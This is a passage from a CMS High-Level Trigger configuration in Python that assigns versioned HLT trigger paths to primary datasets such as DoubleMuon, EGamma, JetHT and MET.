'HLT_Dimuon0_Jpsi_NoVertexing_L1_4R_0er1p5R_v7',
'HLT_Dimuon0_Jpsi_NoVertexing_NoOS_v7',
'HLT_Dimuon0_Jpsi_NoVertexing_v8',
'HLT_Dimuon0_Jpsi_v8',
'HLT_Dimuon0_LowMass_L1_0er1p5R_v7',
'HLT_Dimuon0_LowMass_L1_0er1p5_v8',
'HLT_Dimuon0_LowMass_L1_4R_v7',
'HLT_Dimuon0_LowMass_L1_4_v8',
'HLT_Dimuon0_LowMass_v8',
'HLT_Dimuon10_PsiPrime_Barrel_Seagulls_v7',
'HLT_Dimuon18_PsiPrime_noCorrL1_v6',
'HLT_Dimuon18_PsiPrime_v14',
'HLT_Dimuon20_Jpsi_Barrel_Seagulls_v7',
'HLT_Dimuon25_Jpsi_noCorrL1_v6',
'HLT_Dimuon25_Jpsi_v14',
'HLT_DoubleMu2_Jpsi_DoubleTkMu0_Phi_v5',
'HLT_DoubleMu2_Jpsi_DoubleTrk1_Phi1p05_v6',
'HLT_DoubleMu4_3_Bs_v14',
'HLT_DoubleMu4_3_Jpsi_v2',
'HLT_DoubleMu4_JpsiTrkTrk_Displaced_v7',
'HLT_DoubleMu4_JpsiTrk_Displaced_v15',
'HLT_DoubleMu4_Jpsi_Displaced_v7',
'HLT_DoubleMu4_Jpsi_NoVertexing_v7',
'HLT_DoubleMu4_PsiPrimeTrk_Displaced_v15',
'HLT_Mu30_TkMu0_Psi_v1',
'HLT_Mu7p5_L2Mu2_Jpsi_v10',
'HLT_Mu7p5_Track2_Jpsi_v11',
'HLT_Mu7p5_Track3p5_Jpsi_v11',
'HLT_Mu7p5_Track7_Jpsi_v11' ),
Commissioning = cms.vstring( 'HLT_IsoTrackHB_v4',
'HLT_IsoTrackHE_v4',
'HLT_L1_CDC_SingleMu_3_er1p2_TOP120_DPHI2p618_3p142_v2' ),
Cosmics = cms.vstring( 'HLT_L1SingleMuCosmics_v1' ),
DQMOnlineBeamspot = cms.vstring( 'HLT_HT300_Beamspot_v11',
'HLT_HT450_Beamspot_v11',
'HLT_ZeroBias_Beamspot_v4' ),
DisplacedJet = cms.vstring( 'HLT_HT400_DisplacedDijet40_DisplacedTrack_v13',
'HLT_HT425_v9',
'HLT_HT430_DisplacedDijet40_DisplacedTrack_v13',
'HLT_HT430_DisplacedDijet60_DisplacedTrack_v13',
'HLT_HT500_DisplacedDijet40_DisplacedTrack_v13',
'HLT_HT550_DisplacedDijet60_Inclusive_v13',
'HLT_HT650_DisplacedDijet60_Inclusive_v13' ),
DoubleMuon = cms.vstring( 'HLT_DoubleL2Mu23NoVtx_2Cha_CosmicSeed_NoL2Matched_v2',
'HLT_DoubleL2Mu23NoVtx_2Cha_CosmicSeed_v2',
'HLT_DoubleL2Mu23NoVtx_2Cha_NoL2Matched_v2',
'HLT_DoubleL2Mu23NoVtx_2Cha_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_CosmicSeed_Eta2p4_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_CosmicSeed_NoL2Matched_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_CosmicSeed_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_Eta2p4_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_NoL2Matched_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_v2',
'HLT_DoubleL2Mu30NoVtx_2Cha_CosmicSeed_Eta2p4_v2',
'HLT_DoubleL2Mu30NoVtx_2Cha_Eta2p4_v2',
'HLT_DoubleL2Mu50_v2',
'HLT_DoubleMu33NoFiltersNoVtxDisplaced_v1',
'HLT_DoubleMu3_DCA_PFMET50_PFMHT60_v10',
'HLT_DoubleMu3_DZ_PFMET50_PFMHT60_v10',
'HLT_DoubleMu3_DZ_PFMET70_PFMHT70_v10',
'HLT_DoubleMu3_DZ_PFMET90_PFMHT90_v10',
'HLT_DoubleMu40NoFiltersNoVtxDisplaced_v1',
'HLT_DoubleMu43NoFiltersNoVtx_v4',
'HLT_DoubleMu48NoFiltersNoVtx_v4',
'HLT_DoubleMu4_Mass3p8_DZ_PFHT350_v8',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_Mass3p8_v5',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_Mass8_v5',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_v15',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_v14',
'HLT_Mu17_TrkIsoVVL_v13',
'HLT_Mu17_v13',
'HLT_Mu18_Mu9_DZ_v4',
'HLT_Mu18_Mu9_SameSign_DZ_v4',
'HLT_Mu18_Mu9_SameSign_v4',
'HLT_Mu18_Mu9_v4',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_DZ_Mass3p8_v3',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_DZ_Mass8_v3',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_DZ_v3',
'HLT_Mu19_TrkIsoVVL_Mu9_TrkIsoVVL_v3',
'HLT_Mu19_TrkIsoVVL_v4',
'HLT_Mu19_v4',
'HLT_Mu20_Mu10_DZ_v4',
'HLT_Mu20_Mu10_SameSign_DZ_v4',
'HLT_Mu20_Mu10_SameSign_v4',
'HLT_Mu20_Mu10_v4',
'HLT_Mu23_Mu12_DZ_v4',
'HLT_Mu23_Mu12_SameSign_DZ_v4',
'HLT_Mu23_Mu12_SameSign_v4',
'HLT_Mu23_Mu12_v4',
'HLT_Mu37_TkMu27_v5',
'HLT_Mu8_TrkIsoVVL_v12',
'HLT_Mu8_v12',
'HLT_TripleMu_10_5_5_DZ_v10',
'HLT_TripleMu_12_10_5_v10',
'HLT_TripleMu_5_3_3_Mass3p8_DCA_v3',
'HLT_TripleMu_5_3_3_Mass3p8_DZ_v8',
'HLT_TrkMu12_DoubleTrkMu5NoFiltersNoVtx_v6',
'HLT_TrkMu16_DoubleTrkMu6NoFiltersNoVtx_v12',
'HLT_TrkMu17_DoubleTrkMu8NoFiltersNoVtx_v13' ),
DoubleMuonLowMass = cms.vstring( 'HLT_Dimuon0_LowMass_L1_TM530_v6',
'HLT_DoubleMu3_TkMu_DsTau3Mu_v4',
'HLT_DoubleMu3_Trk_Tau3mu_NoL1Mass_v6',
'HLT_DoubleMu3_Trk_Tau3mu_v12',
'HLT_DoubleMu4_LowMassNonResonantTrk_Displaced_v15',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_IsoTau15_Charge1_v4',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_IsoTau15_v4',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_Tau15_Charge1_v4',
'HLT_Tau3Mu_Mu7_Mu1_TkMu1_Tau15_v4' ),
EGamma = cms.vstring( 'HLT_DiEle27_WPTightCaloOnly_L1DoubleEG_v4',
'HLT_DiSC30_18_EIso_AND_HE_Mass70_v13',
'HLT_Diphoton30PV_18PV_R9Id_AND_IsoCaloId_AND_HE_R9Id_NoPixelVeto_Mass55_v13',
'HLT_Diphoton30PV_18PV_R9Id_AND_IsoCaloId_AND_HE_R9Id_PixelVeto_Mass55_v15',
'HLT_Diphoton30_18_R9IdL_AND_HE_AND_IsoCaloId_NoPixelVeto_Mass55_v2',
'HLT_Diphoton30_18_R9IdL_AND_HE_AND_IsoCaloId_NoPixelVeto_v2',
'HLT_Diphoton30_22_R9Id_OR_IsoCaloId_AND_HE_R9Id_Mass90_v13',
'HLT_Diphoton30_22_R9Id_OR_IsoCaloId_AND_HE_R9Id_Mass95_v13',
'HLT_DoubleEle25_CaloIdL_MW_v4',
'HLT_DoubleEle27_CaloIdL_MW_v4',
'HLT_DoubleEle33_CaloIdL_MW_v17',
'HLT_DoubleEle8_CaloIdM_TrackIdM_Mass8_DZ_PFHT350_v20',
'HLT_DoubleEle8_CaloIdM_TrackIdM_Mass8_PFHT350_v20',
'HLT_DoublePhoton33_CaloIdL_v6',
'HLT_DoublePhoton70_v6',
'HLT_DoublePhoton85_v14',
'HLT_ECALHT800_v10',
'HLT_Ele115_CaloIdVT_GsfTrkIdT_v14',
'HLT_Ele12_CaloIdL_TrackIdL_IsoVL_PFJet30_v18',
'HLT_Ele135_CaloIdVT_GsfTrkIdT_v7',
'HLT_Ele145_CaloIdVT_GsfTrkIdT_v8',
'HLT_Ele15_CaloIdL_TrackIdL_IsoVL_PFJet30_v3',
'HLT_Ele15_Ele8_CaloIdL_TrackIdL_IsoVL_v3',
'HLT_Ele15_IsoVVVL_PFHT450_CaloBTagDeepCSV_4p5_v8',
'HLT_Ele15_IsoVVVL_PFHT450_PFMET50_v16',
'HLT_Ele15_IsoVVVL_PFHT450_v16',
'HLT_Ele15_IsoVVVL_PFHT600_v20',
'HLT_Ele15_WPLoose_Gsf_v3',
'HLT_Ele16_Ele12_Ele8_CaloIdL_TrackIdL_v9',
'HLT_Ele17_CaloIdM_TrackIdM_PFJet30_v16',
'HLT_Ele17_WPLoose_Gsf_v3',
'HLT_Ele200_CaloIdVT_GsfTrkIdT_v8',
'HLT_Ele20_WPLoose_Gsf_v6',
'HLT_Ele20_WPTight_Gsf_v6',
'HLT_Ele20_eta2p1_WPLoose_Gsf_v6',
'HLT_Ele23_CaloIdL_TrackIdL_IsoVL_PFJet30_v18',
'HLT_Ele23_CaloIdM_TrackIdM_PFJet30_v18',
'HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v19',
'HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_v19',
'HLT_Ele24_eta2p1_WPTight_Gsf_LooseChargedIsoPFTau30_eta2p1_CrossL1_v13',
'HLT_Ele24_eta2p1_WPTight_Gsf_LooseChargedIsoPFTauHPS30_eta2p1_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_LooseChargedIsoPFTauHPS30_eta2p1_TightID_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_MediumChargedIsoPFTauHPS30_eta2p1_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_MediumChargedIsoPFTauHPS30_eta2p1_TightID_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_TightChargedIsoPFTauHPS30_eta2p1_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_TightChargedIsoPFTauHPS30_eta2p1_TightID_CrossL1_v1',
'HLT_Ele250_CaloIdVT_GsfTrkIdT_v13',
'HLT_Ele27_Ele37_CaloIdL_MW_v4',
'HLT_Ele27_WPTight_Gsf_v16',
'HLT_Ele28_HighEta_SC20_Mass55_v13',
'HLT_Ele28_WPTight_Gsf_v1',
'HLT_Ele28_eta2p1_WPTight_Gsf_HT150_v13',
'HLT_Ele300_CaloIdVT_GsfTrkIdT_v13',
'HLT_Ele30_WPTight_Gsf_v1',
'HLT_Ele30_eta2p1_WPTight_Gsf_CentralPFJet35_EleCleaned_v13',
'HLT_Ele32_WPTight_Gsf_L1DoubleEG_v9',
'HLT_Ele32_WPTight_Gsf_v15',
'HLT_Ele35_WPTight_Gsf_L1EGMT_v5',
'HLT_Ele35_WPTight_Gsf_v9',
'HLT_Ele38_WPTight_Gsf_v9',
'HLT_Ele40_WPTight_Gsf_v9',
'HLT_Ele50_CaloIdVT_GsfTrkIdT_PFJet165_v18',
'HLT_Ele50_IsoVVVL_PFHT450_v16',
'HLT_Ele8_CaloIdL_TrackIdL_IsoVL_PFJet30_v16',
'HLT_Ele8_CaloIdM_TrackIdM_PFJet30_v18',
'HLT_Photon100EBHE10_v2',
'HLT_Photon100EB_TightID_TightIso_v2',
'HLT_Photon100EEHE10_v2',
'HLT_Photon100EE_TightID_TightIso_v2',
'HLT_Photon110EB_TightID_TightIso_v2',
'HLT_Photon120EB_TightID_TightIso_v2',
'HLT_Photon120_R9Id90_HE10_IsoM_v14',
'HLT_Photon120_v13',
'HLT_Photon150_v6',
'HLT_Photon165_R9Id90_HE10_IsoM_v15',
'HLT_Photon175_v14',
'HLT_Photon200_v13',
'HLT_Photon20_HoverELoose_v10',
'HLT_Photon20_v2',
'HLT_Photon300_NoHE_v12',
'HLT_Photon30_HoverELoose_v10',
'HLT_Photon33_v5',
'HLT_Photon50_R9Id90_HE10_IsoM_EBOnly_PFJetsMJJ300DEta3_PFMET50_v5',
'HLT_Photon50_R9Id90_HE10_IsoM_v14',
'HLT_Photon50_v13',
'HLT_Photon60_R9Id90_CaloIdL_IsoL_DisplacedIdL_PFHT350MinPFJet15_v11',
'HLT_Photon60_R9Id90_CaloIdL_IsoL_DisplacedIdL_v5',
'HLT_Photon60_R9Id90_CaloIdL_IsoL_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_CaloMJJ300_PFJetsMJJ400DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_CaloMJJ400_PFJetsMJJ600DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_PFJetsMJJ300DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_EBOnly_PFJetsMJJ600DEta3_v5',
'HLT_Photon75_R9Id90_HE10_IsoM_v14',
'HLT_Photon75_v13',
'HLT_Photon90_CaloIdL_PFHT700_v16',
'HLT_Photon90_R9Id90_HE10_IsoM_v14',
'HLT_Photon90_v13',
'HLT_TriplePhoton_20_20_20_CaloIdLV2_R9IdVL_v3',
'HLT_TriplePhoton_20_20_20_CaloIdLV2_v3',
'HLT_TriplePhoton_30_30_10_CaloIdLV2_R9IdVL_v4',
'HLT_TriplePhoton_30_30_10_CaloIdLV2_v4',
'HLT_TriplePhoton_35_35_5_CaloIdLV2_R9IdVL_v4' ),
EcalLaser = cms.vstring( 'HLT_EcalCalibration_v4' ),
EmptyBX = cms.vstring( 'HLT_L1NotBptxOR_v3',
'HLT_L1UnpairedBunchBptxMinus_v2',
'HLT_L1UnpairedBunchBptxPlus_v2' ),
EphemeralHLTPhysics1 = cms.vstring( 'HLT_Physics_part0_v7' ),
EphemeralHLTPhysics2 = cms.vstring( 'HLT_Physics_part1_v7' ),
EphemeralHLTPhysics3 = cms.vstring( 'HLT_Physics_part2_v7' ),
EphemeralHLTPhysics4 = cms.vstring( 'HLT_Physics_part3_v7' ),
EphemeralHLTPhysics5 = cms.vstring( 'HLT_Physics_part4_v7' ),
EphemeralHLTPhysics6 = cms.vstring( 'HLT_Physics_part5_v7' ),
EphemeralHLTPhysics7 = cms.vstring( 'HLT_Physics_part6_v7' ),
EphemeralHLTPhysics8 = cms.vstring( 'HLT_Physics_part7_v7' ),
EphemeralZeroBias1 = cms.vstring( 'HLT_ZeroBias_part0_v6' ),
EphemeralZeroBias2 = cms.vstring( 'HLT_ZeroBias_part1_v6' ),
EphemeralZeroBias3 = cms.vstring( 'HLT_ZeroBias_part2_v6' ),
EphemeralZeroBias4 = cms.vstring( 'HLT_ZeroBias_part3_v6' ),
EphemeralZeroBias5 = cms.vstring( 'HLT_ZeroBias_part4_v6' ),
EphemeralZeroBias6 = cms.vstring( 'HLT_ZeroBias_part5_v6' ),
EphemeralZeroBias7 = cms.vstring( 'HLT_ZeroBias_part6_v6' ),
EphemeralZeroBias8 = cms.vstring( 'HLT_ZeroBias_part7_v6' ),
EventDisplay = cms.vstring( 'HLT_AK4PFJet100_v19',
'HLT_DoublePhoton85_v14',
'HLT_PFJet500_v21' ),
ExpressAlignment = cms.vstring( 'HLT_HT300_Beamspot_v11',
'HLT_HT450_Beamspot_v11',
'HLT_ZeroBias_Beamspot_v4' ),
ExpressPhysics = cms.vstring( 'HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v19',
'HLT_IsoMu20_v15',
'HLT_IsoMu24_v13',
'HLT_IsoMu27_v16',
'HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_v15',
'HLT_Physics_v7',
'HLT_Random_v3',
'HLT_ZeroBias_Alignment_v1',
'HLT_ZeroBias_FirstCollisionAfterAbortGap_v5',
'HLT_ZeroBias_IsolatedBunches_v5',
'HLT_ZeroBias_v6' ),
FSQJet1 = cms.vstring( 'HLT_DiPFJet15_NoCaloMatched_v16',
'HLT_DiPFJet25_NoCaloMatched_v16' ),
FSQJet2 = cms.vstring( 'HLT_DiPFJet15_FBEta3_NoCaloMatched_v17',
'HLT_DiPFJet25_FBEta3_NoCaloMatched_v17',
'HLT_DiPFJetAve15_HFJEC_v17',
'HLT_DiPFJetAve25_HFJEC_v17',
'HLT_DiPFJetAve35_HFJEC_v17' ),
HINCaloJets = cms.vstring( 'HLT_AK4CaloJet100_v10',
'HLT_AK4CaloJet120_v9',
'HLT_AK4CaloJet30_v11',
'HLT_AK4CaloJet40_v10',
'HLT_AK4CaloJet50_v10',
'HLT_AK4CaloJet80_v10' ),
HINPFJets = cms.vstring( 'HLT_AK4PFJet100_v19',
'HLT_AK4PFJet120_v18',
'HLT_AK4PFJet30_v19',
'HLT_AK4PFJet50_v19',
'HLT_AK4PFJet80_v19' ),
HLTMonitor = cms.vstring( 'HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v19',
'HLT_Ele32_WPTight_Gsf_v15',
'HLT_HT400_DisplacedDijet40_DisplacedTrack_v13',
'HLT_HT550_DisplacedDijet60_Inclusive_v13',
'HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v15',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_CaloDiJet30_CaloBtagDeepCSV_1p5_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_PFDiJet30_PFBtagDeepCSV_1p5_v1',
'HLT_PFHT400_SixPFJet32_DoublePFBTagDeepCSV_2p94_v8',
'HLT_PFHT510_v17',
'HLT_PFJet260_v20',
'HLT_PFJet320_v20',
'HLT_PFMET130_PFMHT130_IDTight_v20',
'HLT_PFMET140_PFMHT140_IDTight_v20' ),
HLTPhysics = cms.vstring( 'HLT_Physics_v7' ),
HcalNZS = cms.vstring( 'HLT_HcalNZS_v13',
'HLT_HcalPhiSym_v15' ),
HighPtLowerPhotons = cms.vstring( 'HLT_SinglePhoton10_Eta3p1ForPPRef_v8',
'HLT_SinglePhoton20_Eta3p1ForPPRef_v9' ),
HighPtPhoton30AndZ = cms.vstring( 'HLT_SinglePhoton30_Eta3p1ForPPRef_v9' ),
IsolatedBunch = cms.vstring( 'HLT_HcalIsolatedbunch_v5' ),
JetHT = cms.vstring( 'HLT_AK8PFHT750_TrimMass50_v12',
'HLT_AK8PFHT800_TrimMass50_v12',
'HLT_AK8PFHT850_TrimMass50_v11',
'HLT_AK8PFHT900_TrimMass50_v11',
'HLT_AK8PFJet140_v15',
'HLT_AK8PFJet15_v3',
'HLT_AK8PFJet200_v15',
'HLT_AK8PFJet25_v3',
'HLT_AK8PFJet260_v16',
'HLT_AK8PFJet320_v16',
'HLT_AK8PFJet330_TrimMass30_PFAK8BTagDeepCSV_p17_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BTagDeepCSV_p1_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BoostedDoubleB_np2_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BoostedDoubleB_np4_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BoostedDoubleB_p02_v3',
'HLT_AK8PFJet360_TrimMass30_v18',
'HLT_AK8PFJet380_TrimMass30_v11',
'HLT_AK8PFJet400_TrimMass30_v12',
'HLT_AK8PFJet400_v16',
'HLT_AK8PFJet40_v16',
'HLT_AK8PFJet420_TrimMass30_v11',
'HLT_AK8PFJet450_v16',
'HLT_AK8PFJet500_v16',
'HLT_AK8PFJet550_v11',
'HLT_AK8PFJet60_v15',
'HLT_AK8PFJet80_v15',
'HLT_AK8PFJetFwd140_v14',
'HLT_AK8PFJetFwd15_v3',
'HLT_AK8PFJetFwd200_v14',
'HLT_AK8PFJetFwd25_v3',
'HLT_AK8PFJetFwd260_v15',
'HLT_AK8PFJetFwd320_v15',
'HLT_AK8PFJetFwd400_v15',
'HLT_AK8PFJetFwd40_v15',
'HLT_AK8PFJetFwd450_v15',
'HLT_AK8PFJetFwd500_v15',
'HLT_AK8PFJetFwd60_v14',
'HLT_AK8PFJetFwd80_v14',
'HLT_CaloJet500_NoJetID_v12',
'HLT_CaloJet550_NoJetID_v7',
'HLT_DiPFJetAve100_HFJEC_v16',
'HLT_DiPFJetAve140_v13',
'HLT_DiPFJetAve160_HFJEC_v16',
'HLT_DiPFJetAve200_v13',
'HLT_DiPFJetAve220_HFJEC_v16',
'HLT_DiPFJetAve260_v14',
'HLT_DiPFJetAve300_HFJEC_v16',
'HLT_DiPFJetAve320_v14',
'HLT_DiPFJetAve400_v14',
'HLT_DiPFJetAve40_v14',
'HLT_DiPFJetAve500_v14',
'HLT_DiPFJetAve60_HFJEC_v15',
'HLT_DiPFJetAve60_v14',
'HLT_DiPFJetAve80_HFJEC_v16',
'HLT_DiPFJetAve80_v13',
'HLT_DoublePFJets100_CaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets116MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets128MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets200_CaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets350_CaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets40_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets100_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets200_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets350_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets40MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets40_CaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets54MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_Mu12_DoublePFJets62MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_PFHT1050_v18',
'HLT_PFHT180_v17',
'HLT_PFHT250_v17',
'HLT_PFHT330PT30_QuadPFJet_75_60_45_40_TriplePFBTagDeepCSV_4p5_v3',
'HLT_PFHT330PT30_QuadPFJet_75_60_45_40_v9',
'HLT_PFHT350MinPFJet15_v9',
'HLT_PFHT350_v19',
'HLT_PFHT370_v17',
'HLT_PFHT400_FivePFJet_100_100_60_30_30_DoublePFBTagDeepCSV_4p5_v8',
'HLT_PFHT400_FivePFJet_100_100_60_30_30_v8',
'HLT_PFHT400_FivePFJet_120_120_60_30_30_DoublePFBTagDeepCSV_4p5_v8',
'HLT_PFHT400_SixPFJet32_DoublePFBTagDeepCSV_2p94_v8',
'HLT_PFHT400_SixPFJet32_v8',
'HLT_PFHT430_v17',
'HLT_PFHT450_SixPFJet36_PFBTagDeepCSV_1p59_v7',
'HLT_PFHT450_SixPFJet36_v7',
'HLT_PFHT500_PFMET100_PFMHT100_IDTight_v12',
'HLT_PFHT500_PFMET110_PFMHT110_IDTight_v12',
'HLT_PFHT510_v17',
'HLT_PFHT590_v17',
'HLT_PFHT680_v17',
'HLT_PFHT700_PFMET85_PFMHT85_IDTight_v12',
'HLT_PFHT700_PFMET95_PFMHT95_IDTight_v12',
'HLT_PFHT780_v17',
'HLT_PFHT800_PFMET75_PFMHT75_IDTight_v12',
'HLT_PFHT800_PFMET85_PFMHT85_IDTight_v12',
'HLT_PFHT890_v17',
'HLT_PFJet140_v19',
'HLT_PFJet15_v3',
'HLT_PFJet200_v19',
'HLT_PFJet25_v3',
'HLT_PFJet260_v20',
'HLT_PFJet320_v20',
'HLT_PFJet400_v20',
'HLT_PFJet40_v21',
'HLT_PFJet450_v21',
'HLT_PFJet500_v21',
'HLT_PFJet550_v11',
'HLT_PFJet60_v21',
'HLT_PFJet80_v20',
'HLT_PFJetFwd140_v18',
'HLT_PFJetFwd15_v3',
'HLT_PFJetFwd200_v18',
'HLT_PFJetFwd25_v3',
'HLT_PFJetFwd260_v19',
'HLT_PFJetFwd320_v19',
'HLT_PFJetFwd400_v19',
'HLT_PFJetFwd40_v19',
'HLT_PFJetFwd450_v19',
'HLT_PFJetFwd500_v19',
'HLT_PFJetFwd60_v19',
'HLT_PFJetFwd80_v18',
'HLT_QuadPFJet103_88_75_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet103_88_75_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet103_88_75_15_v5',
'HLT_QuadPFJet105_88_76_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet105_88_76_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet105_88_76_15_v5',
'HLT_QuadPFJet111_90_80_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet111_90_80_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet111_90_80_15_v5',
'HLT_QuadPFJet98_83_71_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet98_83_71_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet98_83_71_15_v5',
'HLT_Rsq0p35_v15',
'HLT_Rsq0p40_v15',
'HLT_RsqMR300_Rsq0p09_MR200_4jet_v15',
'HLT_RsqMR300_Rsq0p09_MR200_v15',
'HLT_RsqMR320_Rsq0p09_MR200_4jet_v15',
'HLT_RsqMR320_Rsq0p09_MR200_v15',
'HLT_SingleJet30_Mu12_SinglePFJet40_v11' ),
L1Accept = cms.vstring( 'DST_Physics_v7',
'DST_ZeroBias_v2' ),
MET = cms.vstring( 'HLT_CaloMET100_NotCleaned_v4',
'HLT_CaloMET110_NotCleaned_v4',
'HLT_CaloMET250_NotCleaned_v4',
'HLT_CaloMET300_NotCleaned_v4',
'HLT_CaloMET350_NotCleaned_v4',
'HLT_CaloMET80_NotCleaned_v4',
'HLT_CaloMET90_NotCleaned_v4',
'HLT_CaloMHT90_v4',
'HLT_DiJet110_35_Mjj650_PFMET110_v9',
'HLT_DiJet110_35_Mjj650_PFMET120_v9',
'HLT_DiJet110_35_Mjj650_PFMET130_v9',
'HLT_L1ETMHadSeeds_v2',
'HLT_MET105_IsoTrk50_v9',
'HLT_MET120_IsoTrk50_v9',
'HLT_MonoCentralPFJet80_PFMETNoMu110_PFMHTNoMu110_IDTight_v20',
'HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight_v20',
'HLT_MonoCentralPFJet80_PFMETNoMu130_PFMHTNoMu130_IDTight_v19',
'HLT_MonoCentralPFJet80_PFMETNoMu140_PFMHTNoMu140_IDTight_v19',
'HLT_PFMET100_PFMHT100_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET100_PFMHT100_IDTight_PFHT60_v9',
'HLT_PFMET110_PFMHT110_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET110_PFMHT110_IDTight_v20',
'HLT_PFMET120_PFMHT120_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET120_PFMHT120_IDTight_PFHT60_v9',
'HLT_PFMET120_PFMHT120_IDTight_v20',
'HLT_PFMET130_PFMHT130_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET130_PFMHT130_IDTight_v20',
'HLT_PFMET140_PFMHT140_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET140_PFMHT140_IDTight_v20',
'HLT_PFMET200_BeamHaloCleaned_v9',
'HLT_PFMET200_NotCleaned_v9',
'HLT_PFMET250_NotCleaned_v9',
'HLT_PFMET300_NotCleaned_v9',
'HLT_PFMETNoMu100_PFMHTNoMu100_IDTight_PFHT60_v9',
'HLT_PFMETNoMu110_PFMHTNoMu110_IDTight_v20',
'HLT_PFMETNoMu120_PFMHTNoMu120_IDTight_PFHT60_v9',
'HLT_PFMETNoMu120_PFMHTNoMu120_IDTight_v20',
'HLT_PFMETNoMu130_PFMHTNoMu130_IDTight_v19',
'HLT_PFMETNoMu140_PFMHTNoMu140_IDTight_v19',
'HLT_PFMETTypeOne100_PFMHT100_IDTight_PFHT60_v9',
'HLT_PFMETTypeOne110_PFMHT110_IDTight_v12',
'HLT_PFMETTypeOne120_PFMHT120_IDTight_PFHT60_v9',
'HLT_PFMETTypeOne120_PFMHT120_IDTight_v12',
'HLT_PFMETTypeOne130_PFMHT130_IDTight_v12',
'HLT_PFMETTypeOne140_PFMHT140_IDTight_v11',
'HLT_PFMETTypeOne200_BeamHaloCleaned_v9',
'HLT_TripleJet110_35_35_Mjj650_PFMET110_v9',
'HLT_TripleJet110_35_35_Mjj650_PFMET120_v9',
'HLT_TripleJet110_35_35_Mjj650_PFMET130_v9' ),
MonteCarlo = cms.vstring( 'MC_AK4CaloJetsFromPV_v8',
'MC_AK4CaloJets_v9',
'MC_AK4PFJets_v17',
'MC_AK8CaloHT_v8',
'MC_AK8PFHT_v16',
'MC_AK8PFJets_v17',
'MC_AK8TrimPFJets_v17',
'MC_CaloBTagDeepCSV_v8',
'MC_CaloHT_v8',
'MC_CaloMET_JetIdCleaned_v9',
'MC_CaloMET_v8',
'MC_CaloMHT_v8',
'MC_Diphoton10_10_R9Id_OR_IsoCaloId_AND_HE_R9Id_Mass10_v13',
'MC_DoubleEle5_CaloIdL_MW_v15',
'MC_DoubleMuNoFiltersNoVtx_v7',
'MC_DoubleMu_TrkIsoVVL_DZ_v11',
'MC_Ele15_Ele10_CaloIdL_TrackIdL_IsoVL_DZ_v15',
'MC_Ele5_WPTight_Gsf_v8',
